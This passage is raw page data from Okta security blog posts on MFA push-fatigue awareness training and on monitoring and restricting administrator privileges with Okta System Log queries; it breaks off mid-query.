Depending on your configuration, an Okta Verify Push request displays a range of information including:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The recorded location of the browser making the request\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The recorded device making the request\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine admins can also add further context to each request using a feature now available in Early Access. This adds to each Push request:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"the name of the application requested, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"the sign-in URL.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Crucially, if the organization enables Number Challenge (which can be applied to all Push notifications, or only for risky sign-ins), the user also has to verify a random number presented on the sign-in widget.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"475lwmyyqMduuCsDAVhabo\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Verify Push with Number 
Challenge\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All of this context can help users identify when an attacker attempts to use stolen credentials to access their account.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The power of training\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To be effective, users need to be aware of what this context means. That’s where security awareness training comes in. As I’ve \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://symantec-enterprise-blogs.security.com/blogs/feature-stories/5-must-have-elements-include-your-security-awareness-program\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"previously opined\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", learners are more likely to retain and apply advice if it is provided in the context of their daily work, and where opportunities are provided for strong, positive habits to form.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Historically, security awareness training has appropriately focused on the areas of the most heightened risk: password hygiene. 
Given the increasing prevalence and effectiveness of multi-factor authentication, there is also value in training users about the methods an attacker armed with stolen credentials might employ when attempting to bypass MFA challenges.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The most common social engineering techniques we have observed, and some corresponding learning outcomes to target for your security awareness training, are included in the table below:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"1cdIkKOCHlERWGsujFO1MO\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sample Learning Outcomes\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Introducing \\\"Push Bomb\\\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Push Bomb\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" is an example of a learning experience that can be used to raise user awareness about Push Fatigue attacks and teaches them how to assess the context of a Push notification.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Push Bomb\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" is a proof of concept Okta Workflow developed by Solution Engineer Marc Miller that schedules unsolicited push notifications to a defined group of users to test whether they accept, reject or ignore the request. 
It provides users a first-hand experience of an MFA Fatigue attack, just as phishing simulations do for credential phishing campaigns.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Marc's Workflow (which is not an Okta supported product) does all of the following at the push of a button:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Selects a random percentage of users from a defined Okta Group(s) to test according to an admin-defined schedule;\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Leverages the Okta Factors API to check whether each user is enrolled in Push MFA\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sends a Verify push notification to users and polls for the results at admin-defined intervals, logging whether the user accepts, rejects or ignores the request.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sends the user a message on Slack, Teams or email (customer configurable) to confirm they were subject to the test, and offers further guidance based on user actions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Prepares a detailed summary report of results for the 
admin.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"43AlESspXjG6oTOkvNF9wM\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An End User Notification delivered by the Push Bomb Workflow\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The power of positive reporting\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The most important learning outcome, irrespective of the attacker’s methods, is that users are well practiced in alerting the security team about suspicious behavior via channels that are well monitored.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One way for users to develop this muscle memory is via phishing simulations. While the focus of these drills can often lean too heavily into identifying “at-risk” users, the most crucial learning outcome is for users to learn how to quickly report suspicious activity to the right place in both simulated and real-world attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creating easy methods of reporting suspicious activity is critical. \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/suspicious-activity-reporting.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Activity Reporting\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" allows Okta admins to configure their org to email a user whenever their account is accessed from a new device, when a new authenticator (factor) is enrolled or when an existing one is reset. 
Admins can optionally provide the user a one-click path to reporting a suspicious event from the body of the same email.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Just as training and awareness programs need to anticipate the potential bypass of technical controls, your detection and response capability needs to anticipate that users will fail to recognize or act on social engineering attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The next post in this series on phishing resistance will focus on how to use Okta System Log to detect phishing-related events.\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T20:34:05.479Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"<p>Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. <br/> Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. 
Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/leastprivilege","id":"9d58bcd8-f61c-566a-a401-43cf9c82d4f7","title":"Monitoring for Abuse of Administrative Privileges","date":"2022-10-25T05:34:21+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All applications require a highly-privileged administrator role to deploy and maintain that application. The monitoring and oversight (audit) of actions performed by users with these roles is a cornerstone of any well-designed security program.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A number of research projects have highlighted ways in which the most privileged administrators in Okta could, if unchecked, abuse their privilege in some way. 
These research efforts serve to reinforce some long-held security principles: most notably the principle of “least privilege,” that a user or application should only have the permissions required to perform a specific role or function, and the principle of governance, where those responsible for holding privileged access are held to account for their actions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Below we’ve presented some best practice advice on limiting, securing and monitoring administrative access to Okta.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Constrain Privileged Roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/healthinsight/healthinsight-security-task-recomendations.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta HealthInsight\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" is a tool that prompts administrators to address misconfigurations or conditions identified in their Okta tenant (“org”). One HealthInsight reminder recommends limiting the number of highly privileged roles (“SuperAdmins”) in any given org.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The SuperAdmin role grants its user full privileges to all the powerful administrative capabilities Okta makes available to its customers. A SuperAdmin can manage users, policies, applications and administrative permissions and set org-level security configurations. 
Every new Okta org is provisioned an account with the ‘SuperAdmin’ role, and the SuperAdmin has the ability to create other admin roles using this account.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As our colleague Gurinder Bhatti recently \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/SuperAdmin-Best-Practices\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"blogged\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", with great power comes great responsibility. The majority of tasks an Okta administrator needs to perform do not require SuperAdmin access. For this reason, there are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/administrators-admin-comparison.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"eight other standard admin roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in every Okta org that can be used to constrain administrator access. Your help desk admin doesn’t need the same rights as the admin that manages API access, for example.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As customer implementations of Okta grow larger and more complex, it creates a requirement to further align administrative capabilities with an individual’s role. To support this need, Okta developed \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/custom-admin-role/custom-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Custom Admin Roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to allow organizations to set even more granular permissions within a role. 
So your helpdesk admin might, for example, only be granted permissions relevant to users within a specific functional unit (organization or group), a specific set of duties or specific applications and resources.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/automation-hooks/delegated-flows/about-delegated-flows.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Delegated flows\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", meanwhile, provides administrators the ability to run (but not modify) specified Okta Workflows, without requiring SuperAdmin access.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Secure Admin Access\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given what an attacker with unauthorized access to highly privileged roles in Okta can do, admin access should be locked down according to the level of risk associated with how that role might be abused.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SuperAdmin roles should ideally make use of Privileged Access Management solutions that securely \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/SuperAdmin-Best-Practices\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"store and rotate ephemeral credentials\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Global Session Policies should enforce shorter session durations and idle timeouts for admins versus regular 
users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While the permissions and resources available to any given admin role might vary, access to the Okta Admin Console would nearly always meet the NIST criteria for an AAL2+ and AAL3 application. At minimum, the total session for an admin would expire at 12 hours, with an idle timeout of no greater than 15-30 minutes.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"1GXHZoMkEUj8FaRjIqSovR\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authentication Policies for access to the Admin Console should at a minimum require:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/09/phishing-resistance-and-why-it-matters\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Phishing Resistant authenticators\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (select “Phishing Resistant” as a possession factor constraint) in a policy that requires any two factor types;\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access from a trusted \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/network/network-zones.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"network zone\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (using an allowlist of trusted 
IPs/ASNs);\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access from a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/devices-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"registered\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/managed-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"managed\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" device (ideally a device exhibiting a strong security posture); and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Re-authentication “at every sign-in”.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"RHqTwD9kVcN1R1coDCLwq\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We also recommend enabling the following features in Okta to prevent abuse of stolen administrative sessions:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/admin-console-protected-actions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protected 
Actions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ASN and IP Session Binding\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auditing and Monitoring Admin Access\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As employees change roles throughout their employment, it is common that they also amass and retain privileged access to systems and data.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Organizations should perform periodic access reviews of admin role assignments and ensure that privileged access is appropriate for each individual. Okta offers an \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Reports/admin-role-assignments-report.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"out-of-the-box report\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that provides a snapshot of all admin roles in use.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"2OCKXRSstHC8anFd9vjokr\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Outside of these pre-built reports, privileged access to Okta’s administrative functions can be monitored by security teams using Okta System Log.  
System Log events can be browsed, searched or filtered in the admin console, queried and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/system-log/#filtering-results\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"filtered\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" programmatically via the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/system-log/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log API\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and can be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/Exporting-Okta-Log-Data?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"exported\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Reports/log-streaming/about-log-streams.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"streamed\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to third-party security monitoring tools.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given there are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"700+ events\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" emitted by System Log, it might seem exhausting to know where to begin monitoring or auditing this access.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are a few ways to narrow it down. 
Keep in mind that most events in System Log follow a similar pattern:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"<domain>, <resource>, <action>\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So the following query returns events related to users:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq user.*\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The next iteration on this query returns events related to user accounts:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq user.account*\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"And the following event returns user password resets:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq user.account.reset_password\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With this structure in mind, below we’ve listed some search terms that could be useful when auditing administrative access.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access to the Admin Console\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All sign-ins to the Okta Admin Console create a unique system log event:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq 
\\\"user.session.access_admin_app\\\"\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sign-in events of interest might include events in which access to the Okta Admin Console is denied, especially where there are multiple failure events.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Similarly, you might be interested in access to the Okta Admin Console from a new device or IP or access that triggers a velocity condition (aka “impossible travel”).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"(NB: both of the detections below assume that the displayName for the Okta Admin Console has not been modified by administrators.)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Query in Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access to Admin Console denied\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.session.access_admin_app\\\" AND outcome.result eq 
\\\"FAILURE\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Denied Access due to ASN/IP Session Binding\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.session.detect_client_roaming\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Request to access Admin Console from new device or IP \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"policy.evaluate_sign_on\\\" and target.displayName eq \\\"Okta Admin Console\\\" and ((debugContext.debugData.behaviors co \\\"New Device=POSITIVE\\\" and debugContext.debugData.behaviors co \\\"New IP=POSITIVE\\\") OR (debugContext.debugData.logOnlySecurityData co \\\"\\\\\\\"New Device\\\\\\\":\\\\\\\"POSITIVE\\\\\\\"\\\" or debugContext.debugData.logOnlySecurityData co \\\"\\\\\\\"New IP\\\\\\\":\\\\\\\"POSITIVE\\\\\\\"\\\"))\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Request to access Admin Console that triggers a Velocity condition\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"policy.evaluate_sign_on\\\" and target.displayName eq \\\"Okta Admin 
